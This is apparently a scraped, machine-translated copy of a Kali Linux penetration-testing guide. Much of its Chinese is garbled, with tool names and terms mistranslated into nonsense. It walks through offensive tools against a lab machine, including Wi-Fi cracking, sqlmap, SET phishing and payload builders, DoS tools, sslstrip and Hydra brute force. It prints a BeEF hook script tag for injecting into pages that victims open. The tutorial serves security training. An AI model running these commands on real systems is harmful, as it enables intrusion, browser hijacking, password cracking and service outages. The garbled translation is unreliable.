English 中文(简体)
Kali Linux - Quick Guide
  • 时间:2024-03-23 13:29:42

Kap Linux - Quick Guide


Previous Page Next Page  

Kap Linux - Installation and Configuration

Kaplav是一家伦理黑客的最佳安全一揽子计划之一,其中包含一套按类别分列的工具。 它是一个公开的来源,其官方网页是

BackTrack是旧版本的Kaplav distribution。 最新释放是Kap2016,1 并且经常更新。

Linux Distribution

1. 安装Kaplav公司

    First, we will download the Virtual box and install it.

    Later, we will download and install Kap Linux distribution.

Download and Install the Virtual Box

当你想在加里夫测试你所不掌握的东西时,一个虚拟的方框特别有用。 如果你想要试验未知的包裹,或者你想测试一部法典,那么把加里夫拖在虚拟箱子上是安全的。

在虚拟盒子的帮助下,你可以把加里夫安装在你的系统上(不是直接安装在硬盘上),同时安装能够使用MAC或Windows或另一个光束的Windows。

让我们了解你如何下载和在贵系统安装虚拟箱。

。 根据您的业务制度,选择正确的一揽子方案。 在这种情况下,如以下屏幕所示,它将是第一个窗口。

Virtual Box First Page

SetUp

下页将允许你选择你希望安装申请的地点。 在这种情况下,让我们把它作为缺省,点击Next

Custom Setup

。 screen。 选择你想要安装的特征,然后点击。

Custom Features

Step 5 -CpckYes,以着手安装。

Network Interface

。 屏蔽。 Cpck Install。

Ready to install

Step 7-Cpck the Finishhton。

Complete Installation

如以下屏幕所示,虚拟方框应用程序现在开放。 现在,我们准备为本手册安装其他主机,并建议使用该手册。

Virtual Manager

Install Kap Linux

现在我们已经成功安装了虚拟箱,让步进入下一步,安装了Kaplav。

Offensive Security

Machine New

选择虚拟硬盘文档和点击Open

Hard Disk File

以下屏幕播放。 页: 1

Create

。 缺省用户名称为root,密码为toor

Kap OS

Update Kap

重要的是不断更新加里尼奥斯及其新版本的工具,以保持功能。 以下是更新Kap的步骤。

-Go to Apppcation > 然后,将进行“适当植被更新”类型和更新,如以下屏幕所示。

Apppcation

Terminal

现在要更新这些工具,将下载“植被升级”类型和新包。

Upgrade

它将询问你是否希望继续。 <Y>“Enter”>

Enter Y

升级到更新的操作系统,“适应性植被分解”

Dist Upgrade

Laboratory Setup

在本节中,我们将建立另一台测试机器,在Kaplavt的工具的帮助下进行测试。

Rapid7 :https://information.rapid7.com/metasploitabledownload.html?LS=1631875&CS=web

Metasploitable

Registering

Machine New

。 页: 1 和点击Open

Existing Hard Disk

Step 5——建立虚拟机器人台的屏幕。 Cpck “Create”。

Machine Popups

缺省用户名称为msfadmin。 页: 1

Login Details

Kap Linux - Information Gathering Tools

在这一章中,我们将讨论加里尼奥的信息收集工具。

NMAP and ZenMAP

NMAP和ZentMAP是用于在Kaplav进行道德 Hack升的有益工具。 NMAP和ZentMAP实际上都是相同的工具,但NMAP则使用指挥线,而ZentMAP则有一个GUI。

国家行动计划是网络发现和安全审计的一个免费工具。 许多系统和网络管理员也认为,网络盘存、管理服务升级时间表以及监测东道或服务时间等任务是有益的。

国家排雷方案以新的方式使用原始IP包,以确定网络上有哪些东道方,提供哪些服务(申请名称和版本),哪些东道国正在运营哪些操作系统(和OS版本),哪些类型的包装过滤器/防火墙正在使用等。

现在,让我们一步步走,学习如何使用《国家行动计划》和《泽斯喀同盟》。

开放申请——01-资料收集——地图或地图。

Nmap ZenMap

下一步是发现目标所在单位的“专业”类型/用途。 根据国家测验计划提供的帮助,对“-O”的测验参数是可变的。 详情请登陆网站 nmap -O 192.168.1.101

下面的屏幕显示,你需要打上上述指挥系统,以了解Nmap的产出。

Nmap Output

Step 3 - 其次,开放TCP和UDP港口。 检查所有根据《西北太平洋行动计划》建立的TCP港口,使用以下指挥系统:

nmap -p 1-65535 -T4  192.168.1.101 

如果参数“-p”是指必须扫描的所有TCP港口。 在这种情况下,我们正在扫描所有港口,而“T4”则是国家北极监测计划必须运行的扫描速度。

以下是结果。 在绿化方面,所有开关港口都是开关港口,红是所有封闭港口。 然而,由于名单太长,因此国家排雷方案没有显示。

Closed Ports

Stealth Scan

Stealth scan or SYN is also known as half-open scan, as it doesn't full the TCP three-wayhake. 一名黑客向目标发送了一套海关数据包;如果收到海关数据表/ACK框架,则其假定目标将完成连接,港口正在聆听。 如果从目标中收到一份《国际船舶和单证法》,则假定该港口没有活动或关闭。

Half Open Scan

Syn Packet

如今,海关数据系统在实践中使用NMAP中的参数-s。 全面指挥——

nmap -sS -T4 192.168.1.101 

下面的屏幕显示如何使用这一指挥——

ZenMap Command

Searchsploit

搜索引擎是一种工具,可帮助加里夫的用户从Exploit数据库档案中直接搜索指挥线。

如以下屏幕所示,开放申请——08-Exploitation Technologies——搜索引擎。

Searchsploit

在启用终点站后,“searchsploit”号()。

Exploit Index Name

DNS Tools

n 本节将学习如何使用Kap已纳入的一些DNS工具。 这些工具基本上有助于地区转让或解决问题的领域。

dnsenum.pl

第一种工具是dnsenum.pl。 它是有助于获取数据和元数据交换、A和与某个领域连接的其他记录的有效手稿。

点击左小组的终点站。

Terminal Left Panel

<“dnsenum area name”,所有记录将予以记录。 在本案中,它有记录。

Domain Name

DNSMAP

第二个工具是DNSMAP,帮助查找我们正在搜索的电话号码、联系和其他与这个领域有联系的子域。 以下是一个例子。

Cpck the end as in the high section , 然后撰写“dnsmap area name”

DNS Map

dnstracer

第三个工具是dnstracer,其中确定某一域名服务器从某个特定东道方获得信息的地点。

如上栏所示,Cpck the码头,然后是“dnstracer area name”

DnsTracer

LBD Tools

LBD(Load Balancing Researchor)的工具非常有趣,因为如果某个领域使用DNS和/或HTTP的负荷平衡,就会发现这些工具。 之所以重要,是因为如果你有两个服务器,一个或另一个服务器可能无法更新,而且你可以尝试加以利用。 以下是使用这一工具的步骤:

第一,在左边小组点击终点站。

Terminal Left Panel

然后,“域名”。 如果它产生“FOUND”的结果,这意味着服务器的负荷平衡。 在这种情况下,结果就是“NOT FOUND”。

LBD Domain Name

Hping3

甲型六氯环己烷被伦理黑客广泛使用。 它几乎与平坐工具相类似,但更先进,因为它可以绕过防火墙过滤器,并使用防波堤、防波堤、防波堤和防暴力侵害妇女国际协议。 它有一种可追溯的方式,而且有能力在覆盖的渠道之间发送档案。

点击左小组的终点站。

Terminal Left Panel

hping3 -h> 这将表明如何使用这一指挥。

Hping3

另一指挥部是“hping3 area or IP -para amount”

IP Parameter

Kap Linux - Vulnerabipty Analyses Tools

在本章中,我们将学会如何利用某些工具帮助我们利用装置或应用,以便获得利用。

Cisco Tools

Kap有一些工具可用于开发Cisco路由器。 其中一种工具是Cisco-torch。 用于大规模扫描、print和开采。

让我们通过点击左肩.来打开终点站。

Terminal Left Panel

然后,“cisco-torch——东道国的计分IP”,如果发现没有开发,则将显示以下结果。

Cisco Torch

了解可使用哪些参数,“cisco-torch ?”

Cisco Parameter

Cisco Auditing Tool

它是一部PERL的文字,用来扫描思科的路由器,以应付共同的脆弱性。 如上一节所示,为了使用,在左板上打开了终点站,并在“CAT -h Hostname or IP”上开放。

页: 1 下面的屏幕显示,在这种情况下,有23个屏幕。

Port Parameter

Cisco Global Exploiter

思科全球开发商(CGE)是一个先进、简单和快速的安全测试工具。 有了这些工具,你可以进行下列几类袭击: 然而,在生活环境中进行测试时,需要小心谨慎,因为其中有些人可能坠毁思科设计。 例如,选择“Option”/ 这些服务可以停止。

Cisco Device

利用这一工具,“cge.plIPaddress。 脆弱性数目”

下面的屏幕显示,从上述清单来看,Cisco路由器测试脆弱性第3号的结果。 结果表明,脆弱性得到了成功利用。

Cisco Router

BED

BED是一个旨在检查潜在缓冲溢流、格式铺设等的平台的方案。

Check Daemons

在这种情况下,我们将用IP192.168.1.102和《吉大港山区议定书》测试机器。

指挥员为“有刺伤者——吉大港山区——t 192.168.1.102”,将继续测试。

Testing

Kap Linux - Wireless Attacks

在本章中,我们将学会如何使用Kaplav所包括的Wi-Fi 裂缝工具。 然而,重要的是,你们的无线卡必须有支持监测模式。

Fern Wifi Cracker

Fern Wifi Ryer是Kap必须打断无线电话的工具之一。

开幕 首先,我们应当把无线卡变成监测方式。 为此,在终点站安装了“奶mon-ngstart wlan-0”

Airmon Ng

现在,开放的Fern Wireless Cracker。

Step 1——应用程序——Cpck“无声攻击”——“Fern Wireless Cracker”。

Fern Wireless Cracker

Step 2——如以下屏幕所示,选取无线卡。

Wireless Card

Access Point

Step 4——在完成扫描后,它将展示所有无线网络。 在这种情况下,只发现了“WPA网络”。

WPA Network

<Step 5——如上述屏幕所示,Cpck WPA网络。 它显示了发现的所有无线。 一般而言,在人民军协会网络中,它进行假冒攻击。

Step 6-Cpck “Browse”,并找到供攻击使用的名词。

Wordpst

Step 7-Cpck “Wifi Attack”。

Wifi Attack

Step 8——在完成了口腔攻击之后,它发现了密码,并将如以下插图所示。

Dictionary Attack

Kismet

Kismet是WIFI网络分析工具。 这是一个802.11层-2无线网络探测器、狙击器和入侵探测系统。 它将与任何支持原始监测(fmon)模式的无线卡合作,并能够传播802.11a/b/g/n的交通。 它通过收集包裹和隐藏网络确定网络。

使用该电线,将无线卡变成监测方式,并在终端中采用“奶mon-ng 开始wlan-0”

Start Wlan

让我们学会如何使用这一工具。

发射,开放式终端和“基斯马特”类型。

Launch

Step 2-Cpck “OK”。

Kismet

Step 3-Cpck “Yes”在要求启用Kismet服务器时。 否则,它将停止运作。

Start Server

<4>Step 4——启动方案,请假作为违约。 Cpck “Start”。

Leave Default

现在,它将提出一个表格,请你确定无线卡。 在这种情况下,点击是。

Define Table

在这种情况下,无线来源为wlan0”。 页: 1

Wirless Source

如以下屏幕所示,它将开始传播wifi网络。

Networks

Step 8——在任何网络上进行点击,如以下屏幕所示,生成无线细节。

Wireless Network

GISKismet

地理信息系统Kismet是一种无线可视的工具,能够以实际的方式代表利用Kismet收集的数据。 GISKismet将信息储存在一个数据库中,以便我们能够查询数据,并使用KQ制作图表。 地理信息系统Kismet目前用于数据库和谷歌地/KML文档制图。

让我们学会如何使用这一工具。

开放地理信息系统Kismet,前往:申请——Cpck“无声攻击”——吉斯基斯金属。

Giskismet

正如你在上一节中所铭记的那样,我们利用Kismet工具,探讨无线网络的数据,以及所有这些数据基斯马特包装在净XML档案中。

将这些档案输入Giskismet, 类型“root&commat;kap:~# giskismet -x Kismetfilename.netxml”,并将开始输入档案。

Importing Files

一旦进口,我们就可以进口到我们以前发现的热点谷地。

Step 3——假设我们已经安装了谷歌地球,我们点击文件——公开文件,称Giskismet制造——Cpck “Open”。

Google Earth

以下地图将展示。

Map

Ghost Phisher

牙齿医生是一种受欢迎的工具,有助于建立无线接入点,随后创建马恩-The-Middle-Attack。

开放,点击应用——无线攻击——“幽灵营养”。

Ghost Phisher

Step 2——在开放之后,我们将利用以下详细情况设立假体。

    Wireless Interface Input: wlan0

    SSID: wireless AP name

    IP address: IP that the AP will have

    WAP: Password that will have this SSID to connect

Opening Ghost Phisher

Wifite

它是另一个无线的黑色工具,它攻击了多个电离层扰动、电离层扰动和电离层扰动网络。

首先,无线卡必须是监测方式。

开放这一系统,进入应用——无线攻击——Wifite。

Wifite

to scan for the web。

Wifite Showb

Scan Network

开始攻击无线网络,点击Ctrl+C。

Attacking

<4>Step 4——类型“1”以打碎第一个无线。

Crack First

Step 5——攻击完成后,将发现关键因素。

Key Found

Kap Linux - Website Penetration Testing

在这一章中,我们将了解Kaplavt提供的网站渗透测试。

Vega Usage

Vega是一个自由和开放的源扫描器和测试平台,用于测试网络应用的安全。 韦加可以帮助你发现并验证Kingk Injection, Cross-Site casting(XSS),无意中透露敏感信息和其他弱点。 它是在Java撰写的,是基于全球倡议的,在Libert、OS X和Windows操作。

Vega包括一台自动扫描仪,用于快速检测和拦截战术检查代理。 可以通过一个强力的、使用网络语言的APIC:Java出版社加以推广。 官方网页是

Subgraph

Step 1-To open Vega go to Apppcations >03-Web Apppcation Analysis —— Vega

Vega

如果你看不到这条道路上的申请,那么指挥就会有以下类型。

Subgraph

开始扫描,点击“+”信号。

Subgraph Vega

进入将扫描的URL网页。 在本案中,该机器是可操作的机器——点击“下一个”。

Enter Page URL

检查你想要控制的所有单元。 然后点击“Next”。

Module Boxes

Next Again

Step 7-Cpck “Finish”。

Finish Button

如下表所示,点击“Yes”。

Follow Redirect

如以下屏幕所示,扫描将继续。

Scanner Progress

Step 9——在扫描完成后,在左边的小组中,你能够看到根据严重程度分类的所有调查结果。 如果你点击,你将看到右小组的所有弱点细节,如“请求”、“讨论”、“影响”和“补救”。

Left Down Panel

ZapProxy

ZAP-OWASP Zed Attack Proxy是一种易于使用的综合渗透测试工具,用于在网络应用中发现弱点。 这是一个 Java接口。

ZapProxy

Step 2-Cpck “Accept”。

Licensed Version

ZAP将开始装货。

OWASP Zap

选择以下屏幕上所示备选办法之一,点击“Start”。

Choose Options

继网络之后,IP :192.168.1。

Web Metasploitable

Step 4——在“URL to attacks”的测试网上“Attack”。

Url Attack

在扫描完成后,在左边的小组上,你将看到所有被拖网的地点。

在左边的小组“Alerts”中,你将看到所有结论和说明。

Alerts

Step 5-Cpck “Spider”,你将看到所有链接扫描。

Spider

Database Tools Usage

sqlmap

qlmap是一种开放源渗透测试工具,使检测和利用Kalljection f和接管数据库服务器的过程自动化。 它涉及一个强大的探测引擎、对最终渗透检测器的许多特殊特征,以及从数据库收集的数据print到通过离班连接进入运行系统的基本档案系统和执行指挥等广泛的交换。

让我们学会如何使用地图。

开放地图,进入应用——04-Database Assessment——qlmap。

SQLMap

易于浏览的KQ射线的网页可以浏览。

SQL Injection

开始克林注射检测,“sqlmap - u URL of victim”

Url Victim

Step 3——从结果来看,你会看到一些变量是脆弱的。

Variable Results

sqlninja

sqlninja在Microsoftkou服务器上向全方位的GUI服务器投射。 sqlninja是利用微软服务器作为其背端的网络应用中利用Kall Injection弱点的工具。 有关这一工具的全部信息可在以下网站查阅:http://sqlninja.sourceforge.net/“http://sqlninja.sourceforge.net/

开放Sqlninja去申请——04-Database Assesment ——qlninja。

Database Assesment

CMS Scanning Tools

WPScan

WPScan是一个黑箱,可用来扫描遥远的文字压力装置,以发现安全问题。

<Step 1-开放WPscan go to Apppcations >03-Web Apppcation Analysis ——“wpscan”。

Web Apppcation

以下屏幕播放。

Wpscan

http://www.wpscan_u URL, 网页

如果扫描仪没有更新,它将请你更新。 我建议这样做。

Scanner Update

一旦扫描开始,你将看到调查结果。 下面的屏幕显示,弱点是用红arrow表示的。

Red Arrow

Scan Starts

Joomscan

由于其灵活性,Joomla可能是最广泛使用的CMS。 对于这个CMS,它是一个Joomla扫描仪。 它将帮助网络开发商和网络主帮助查明其部署的Joomla网站可能存在的安全弱点。

开放时,就在终点站点上点击左小组,然后点击“joomscan——参数”。

帮助使用类别“joomscan /?”

Joomscan

开始扫描,“joomscan -u URL”类。

OWASP

成果将如以下屏幕所示。

Vulnerabipty

Suggestion

SSL Scanning Tools

<TLSSLed是用于评价目标SSL/TLS(HTTPS)网络服务器安装安全情况的无光彩的手稿。 其依据是Sslscan,一个基于开放式图书馆的SSL/TLS扫描仪,另一个基于“开放式星号”。 指挥线工具。

目前的测试包括检查目标是否支持SSLv2议定书、NUL cipher、基于其关键长度(40或56个轨道)的低西半球、如果数字证明是MD5,以及目前的SSL/TLS重新谈判能力,是否有强大的西半球(如AES)。

为开始测试,开放一个终点站和类别。 它将开始测试证书,以找到数据。

Tissled

您从调查结果中可以看到,证书有效期至2018年,如下文中绿色所示。

Certificate

w3af

w3af是一个网络应用程序攻击和审计框架,目的是查明和利用所有网络应用弱点。 一揽子计划为框架提供了图表用户界面。 如果你只需要一条指挥线,就安装了W3af-console。

该框架被称为“网络的金属”,但它实际上比它更多的,因为它还利用黑箱扫描技术发现网络应用的脆弱性。 彩虹岩心及其粉gin在沙里充分写成。 该项目有130多个原始材料,其中查明和利用注射、交叉笔录(XQSS)、远距离文档包容和更多。

开放申请——03-Web Apppcation Analysis——Cpck w3af。

Apppcation W3af

在“目标”上,受害人的URL进入了该中心,在这种情况下,该网址是可操作的。

Target

Profile Start

前往“Results”,你可以详细了解调查结果。

Finding Results

Kap Linux - Exploitation Tools

在本章中,我们将了解加里尼奥斯提供的各种开发工具。

Metasploit

正如我们前面提到的那样,Metasploit是快速7的产物,大部分资源可在网页www.metasploit.com上找到。 该手册有两种版本:商业版和免费版。 因此,这两个版本之间的差异并不大,在这种情况下,我们将使用共同体版本(自由)。

作为一名道德的哈萨克人,你将使用“Kap Ditribution”,该表含有Metasploit社区版本,以及其他一些通过节省安装时间而非常舒适的道德习惯工具。 然而,如果你想要安装一个单独的工具,则可以在像Ltino、Windows和OS X这样的操作系统中安装。

第一,在加里开放梅塔·科塞莱。 然后,再到应用——开发工具——Metasploit。

Exploitation Tools

在开始后,你将看到以下屏幕,即Metasploit的版本在红色上得到强调。

Metasploit Version

在青少年中,如果你使用帮助或帮助? 页: 1 你们可以根据你们的需要和你将使用的东西选择。

Console Symbol

另一项重要的行政指挥是.msfupdate。 这有助于通过利用最近的脆弱性来更新气象卫星。 在奥洛尔岛进行这一指挥之后,你将不得不等几分钟,直到更新工作完成。

MSFUpdate

它有一个称为“等级”的良好指挥,你可以用来找到你在以下屏幕上显示的希望。 例如,我想找到与微软有关的开发,而指挥可以是msf >search name:Microsoft category:exploit

在“研究”是指挥的情况下,“名称”是我们所研究对象的名称,“类型”是我们所寻求的描述。

Search Command

另一指挥部是“信息”。 报告提供了关于使用该模块或平台的信息,谁是作者、脆弱性参考以及该模块的载荷限制。

Info Command

Armitage

用于气象的军备总指挥部是用于气象的辅助工具。 它直观目标,建议利用,并暴露先进的开发后特征。

让我们开放,但首先应当开放和启动。 开放军械库,去申请——开发工具——军火。

Armitage

页: 1

Connect

在开放时,你将看到以下屏幕。

User Friendly

武器使用方便。 “目标”区罗列了你发现的所有机器,而且你正在与这些机器合作, ha落的目标与stor底相重。

在你打垮了目标之后,你可以正确点击,继续探讨你需要做些什么,例如探索(浏览)夹。

Exploring

在以下全球倡议中,你将看到被称作“圣杯”的夹眼。 仅仅通过点击手,你就可以在不需要美术指挥的情况下通过手套进行航行。

在《全球倡议》右边,是列出脆弱性模块的章节。

Console Folder

BeEF

BeEF 代表Browser Exploitation Framework。 这是一个以网络浏览器为重点的渗透测试工具。 职业渗透检测器可使用客户方攻击病媒评估目标环境的实际安全态势。

第一,你必须利用以下指挥系统更新加里一揽子计划:

root@kap:/# apt-get update  
root@kap:/# apt-get install beef-xss 

开始使用以下指挥系统:

root@kap:/# cd /usr/share/beef-xss  
root@kap:/# ./beef 

Kap Package

开放浏览器并进入用户名和密码:beef

Open Browser

The BeEF hook is a Javacast fileshop on the BeEF services, that needs toî onuser browsers. 当它这样做时,它就向BeEF服务器发出呼吁,告知有关目标的许多信息。 它还使更多的指挥和单元与目标背道而驰。 例如,BeEF。 h 见http://192.168.1.101:3000/hook.js

为了攻击一个浏览器,将Java语放在客户认为的网页上。 这样做有多种方法,但最容易的是将以下内容插入一页,让客户开放。

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script> 

页面负荷过后,又回到贝EF控制小组,在左上点点击“在线浏览器”。 在几秒之后,你应当看到你代表一个被忽略的浏览器的IP地址。 接管知识产权将迅速提供信息,如浏览器版本、操作系统和安装的原始产品。

Page Load

遥控指挥,点击“拥有”的东道方。 然后,在指挥部上点击了你想要执行的单元,最后点击“Execute”。

Run Remotely

Linux Exploit Suggester

它建议,鉴于第`auname -r'号的六氯环己烷操作系统,可能进行开采。

a. 指挥:

root@kap:/usr/share/pnux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0是我们希望加以利用的欧伦托式版。

Kernel Version

Kap Linux - Forensics Tools

在本章中,我们将了解在加里尼奥斯的现有法医工具。

p0f

p0f是一种工具,可以仅仅通过检查所捕获的包装单确定目标东道方的运行系统,即使有关装置位于包装防火墙后面。 P0f没有产生任何直接或间接的网络交通;没有名称调查;没有神秘问题;没有ARIN查询;没有。 在先进用户手中,P0f可探测防火墙的存在、NAT的使用以及装载平衡器的存在。

, 以便了解如何使用,并取得以下结果。

Target Host

Advanced Users

它将列出甚至现有的接口。

Available Interface

然后,指挥类型如下:“p0f -i eth0 -p -o filename”

如果参数-i”是上面所示接口名称,-p>即为顺便宜之计-o> 系指该产出将在档案中保存。

Type of Command

开放网页,地址: 192.168.1.2

Webpage Address

从结果来看,你可以观察到,网络服务器正在使用2.x,而本组织是德比亚。

pdf-parser

pdf-parser是一种工具,使人民抵抗力量的文件能够确定分析后pdf档案中所使用的基本要素。 它不会提供人民抵抗力量的文件。 并没有建议为国防军教职员工提供课本,但这项工作已经完成。 一般来说,这被用于pdf档案中你怀疑有文字。

指挥是:

pdf-parser  -o 10 filepath

“o” 是物体的数量。

Number Object

如你在以下屏幕上看到的那样,pdf档案打开了CMD指挥部。

CMD Command

Dumpzilla

Dumpzilla的申请是在3.x中开发的,目的是从Peth、Iceweasel和Seanmonkey brows获得所有具有法医意义的信息,以便进行分析。

ddrescue

它将数据从一个档案或碎片装置(硬盘、rom等)复制到另一个文档或装置,试图在出现错误时首先拯救好部分。

ddrescue的基本运行完全自动。 也就是说,你不必等待错误、停止方案、从新的职位上重新启动方案等。

如果你使用Ddrescue地图单特征,那么数据就会非常高效地加以拯救(仅读到所需区块)。 此外,你可以随时打断救援工作,并在稍后时间恢复救援工作。 地图册是德鲁塞斯库的效能的重要组成部分。 除非你知道你正在做什么,否则使用否决权。

指挥线是:

dd_rescue infilepath  outfilepath

页: 1 img文档是回收图像。

Recovered Image

DFF

这是用来追回档案的另一个法医工具。 它还有一个全球倡议。 为开放,“>“dff-gui”号”在终点站开放,以下网站将开放。

DFF GUI

Cpck file ——“Open Evidence”。

Open Evidence

下表将开放。 检查“Raw格式”和点击“+”,以选择你希望回收的夹。

Raw Format

然后,你可以浏览一下电线左侧的档案,看已经找到什么。

Browse File

Kap Linux - Social Engineering

在本章中,我们将了解在加里尼奥斯使用的社会工程工具。

Social Engineering Toolkit Usage

Social-Engineer Toolkit (SET) is an open-sourceacy test framework aiming for social Engineering. SET有若干习俗性攻击病媒,使你能够在一定时间内进行可观的攻击。 这些工具利用人类行为将其渗透到攻击媒介。

让我们学会如何使用社会工程师工具包。

Step 1-开放SET, 转至应用程序——社会工程工具——Cpck “SET”社会工程工具。

Social Engineering Tools

它将询问你是否同意使用条件。 y”,如下文 screen所示。

Type Y

下面的屏幕显示的男性大多是自我解释的,其中最重要的是第1号“社会工程攻击”。

Self Explained

<Step 4——1>> > > >。 一个小岛将开放。 如果你再次发布Enter,那么你将看到每个小岛的解释。

营养化模块使你能够特别制作电子邮件信息,并随附FileFormatmapcious将其发送给您的目标群体。 有效载荷。 例如,发送恶意的PDF文件,如果受害者公开,就会损害该制度。 如果你想拿到你的电子邮件地址,则肯定会安装“信箱”,并将“信箱”改为“信箱”。

粉碎攻击有两个选择:

    Perform a Mass Email Attack

    Create a FileFormat Payload and a Social-Engineering Template

第一个是让SET为你们做一切(选择1),第二个是创建你自己的“Filmat”有效载荷,在你自己的袭击中使用。

Third Party

<99>> 回到主要菜单上,然后改为2” 去“网络攻击矢量”。

网上攻击模块是利用多种网络攻击来损害预期受害者的独特方式。 如果受害人点击该链接,则使用该模块对受害人进行营养攻击。 一旦点击连接,就会发生各种各样的袭击。

Multi Attack

99>> 返回主菜,然后改为3”

传染性USB/CD/DVD模块将产生一个自动文档和一个Metasploit有效载荷。 有效载荷和自动文档被烧或复制到USB。 当DVD/USB/CD被插入受害人的机器时,它将引发一个汽车特征(如果能够自动运行),希望会损害该系统。 你可以找到你希望使用的攻击媒介:档案包或直截了当。

以下是传染性媒体发电机的选择。

    File-Format Exploits

    Standard Metasploit Executable

Infectious

<99” 回到主菜园。 然后,<>>>改为“网络攻击病媒”。

创建有效载荷和听众是创造梅塔斯蒂特有效载荷的简单途径。 它将向你们出口前卷,并培养一位听众。 你们需要说服受害者下载上述档案,并把它付诸实施,以获得损失。

Create Payload

<99>> 回到主要菜单上,然后改为 5” 去“网络攻击矢量”。

Web Attack Vector

大规模邮寄者袭击将使你能够向受害人发出多封电子邮件,并定制这些信息。 大众电子邮件有两种选择;第一个选择是向单一电子邮件地址发送电子邮件。 第二种方案允许你进口一份名单,列出所有接收电子邮件的人,并将向名单上的尽可能多的人发出你的信息。

    E-Mail Attack Single Email Address

    E-Mail Attack Mass Mailer

<99” 回到主菜单上,然后改为9” 前往“强食攻击者”。

Powershell

强权攻击Verctor模块使你能够制造火炮具体攻击。 这些攻击使你能够使用PowerShell,所有操作系统Windowsista和Vi以上都缺省。 权力 壳牌为部署有效载荷和履行不受预防技术触发的职能提供了富有成果的景象。

    Powershell Alphanumeric Shellcode Injector

    Powershell Reverse Shell

    Powershell Bind Shell

    Powershell Dump SAM Database

Kap Linux - Stressing Tools

强调各种工具被用于制造多功能攻击或为不同的应用制造压力测试,以便今后采取适当措施。

所有压力检测工具都在应用-02-Vulnerabipty Analysis-Stress测试中找到。

Vulnerabipty Analysis

所有压力检测将在有192.168.1的IP的可操作机器上进行。

Stress Testing

Slowhttptest

低温检测是DoS攻击工具之一。 它特别利用吉大港山区议定书与服务器连接,并保持诸如万国邮联和援助团等资源繁忙。 让我们详细了解如何使用它并解释其职能。

开放速度缓慢的网播,首先开放终端和“低射线——参数”

你们可以打上“低射线”的字眼,看看你需要使用的所有弹.。 如果获得产出,“没有发现”的“体会”,你必须首先使用“速效植被放慢试验”

Show Http Test

Command Not Found

安装后,再打上slowtest -h

Slow Headers

指挥类型:

slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u 
http://192.168.1.202/index.php -x 24 -p 2

如果有,

    (-c 500) = 500链接

    (-H) = 低温模式

    <-g = 基因统计

    产出档案

    -i 10 = 使用10秒钟等待数据

    -r 200 = 200 connection with -t GET = GET申请

    -u> http://192.168.1.202/index.php = 目标URL

    -x 24 = 不超过24英亩

    -p 2 = 2秒

Time Seconds

试验一旦开始,产出将如以下屏幕所示,届时你可以注意到该服务已经提供。

Test Starts

之后,在287条连接线上,服务中断。 这意味着服务器能够处理最多287个吉大港山区连接点。

Connection

Inviteflood

特约洛德是SIP/SDP INVITE的电文,在UDP/IP上空淹没。 它在各种含水层分布上执行。 它通过发出多次国际投资争端解决中心的请求,对SIP装置进行多功能攻击。

开放专用电话,首先开放终端和“inviteflood -paraifs”

您可使用“inviteflood -h”

Invite Flood

其次,你可以使用以下指挥系统:

inviteflood eth0 target_extension  target_domain target_ip number_of_packets

如果有,

    target_extension, 2000年

    target_domain is 192.168.x.

    target_ip is 192.168.x.

    -a是SIP账户的其他内容

Target Execution

Iaxflood

Iaxflood是VoIP DoS的工具。 开放,“axflood sourcenameapat num Packets”>。

了解如何使用“iaxflood -h”

Iaxflood

thc-ssl-dos

THC-SSL-DOS是核查SSL业绩的工具。 建立有保障的SSL连接要求服务器的加工能力比客户多15x。 THCSSL-DOS利用这种不对称财产,超载服务器,将其从互联网上打碎。

指挥:

thc-ssl-dos victimIP httpsport –accept 

就是:

thc-ssl-dos 192.168.1.1 443 –accept 

其产出如下:

SSL Performance

SSL Error

Kap Linux - Sniffing & Spoofing

传播工具的基本概念非常简单,因为电离线和加里夫在这方面拥有一些受欢迎的工具。 在本章中,我们将了解在加里现有的传播和传承工具。

Burpsuite

申请可用作浏览器和网络服务器之间的沟通工具,以找到网络应用所使用的参数。

开放申请申请——网络申请分析——付费。

Web Analysis

为了打上iff子,我们把bur作为代理人。 为此,请在以下屏幕上显示申请。 如所示,核对箱子。

在这种情况下,代理IP将为127.0.0.1港,8080港。

Proxy IP

然后没收了装饰机和港口的 IP。

Configure Browser

为了开始拦截,前往Proxy ——Intercept ——点击“Intercept is on”。

继续在你希望找到参数以测试脆弱性的网页上航行。

Intercept

在这种情况下,该机器是可操作的机器,有IP 192.168.1。

Machine IP

Go to “HTTP history. 在下面的屏幕上,红色箭标线显示最后一项要求。 在Raaw和隐蔽的参数,如会议设计书和其他参数,如用户名称和密码,都用红字加以强调。

Request Parameter

mitmproxy

mitmproxy 是SSL-capable man-in-the-middle HTTP代理。 该系统提供一种黄色接口,使空中交通能够接受检查和在航空上进行编辑。

开放至终点站和类别“下限-参数” http://www.un.org/Depts/DGACM/index_french.htm

Mitmproxy

开始使用最低轨道,“mitmproxy -p Port number”>。 在该案中,是“mit-p 80”。

Port Number

Wireshark

电机是最佳数据包装分析器之一。 它在框架层面对包装进行深入分析。 您可从其官方网页上获得更多的信息。 在Kap,它采用以下途径:申请——Sniffing &Spoofing ——丝网。

Wireshark

在你点击电线后,以下全球倡议打开了大门。

Wireshark GUI

如以下屏幕所示,浮标“Start”和包装物捕获将开始。

Packet Capturing

sslstrip

slstrip是MITM攻击,迫使受害者浏览器在吉大港山区进行便衣通信,而轴心则从HTTPS服务器更改内容。 为了做到这一点,Sslstrip是“stripping” https://URLs,并将其变为http://URLs。

开放申请——09-Sniffing &Spoofing ——Spoofing and MITM ——slstrip。

Spoofing

Apppcation MITM

为设立这一机制,将80份港口通信全部转交8080份。

Port Comminucation

然后,开始slstrip。 港口需要指挥。

SSLtrip Command

Kap Linux - Password Cracking Tools

在本章中,我们将了解在加里尼奥斯使用的重要密码压制工具。

Hydra

Hydr是一种支持许多攻击议定书的 log(Cisco AA、Cisco auth、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、HTTP(S)---HEAD、HTTP-Proxy、ICQ、IMAP、LDAP、LDAP-SQL、MSQL、NNTP、Oracleener、SID、PC-Any、PC-S、PC-SES、RPS、RPS、L、RNS3

开放申请:通过口号攻击——在线攻击——水。

Hydra

如以下屏幕所示,它将开放终端星群。

Open Terminal

在这种情况下,我们将向FTP提供可使用机器,即IP 192.168.1.101。

Brute Force

我们在Kap创建了一个在上添加“lst”的字表。

Share Wordpst

指挥如下:

hydra -l /usr/share/wordpsts/metasploit/user -P 
/usr/share/wordpsts/metasploit/ passwords ftp://192.168.1.101 –V 

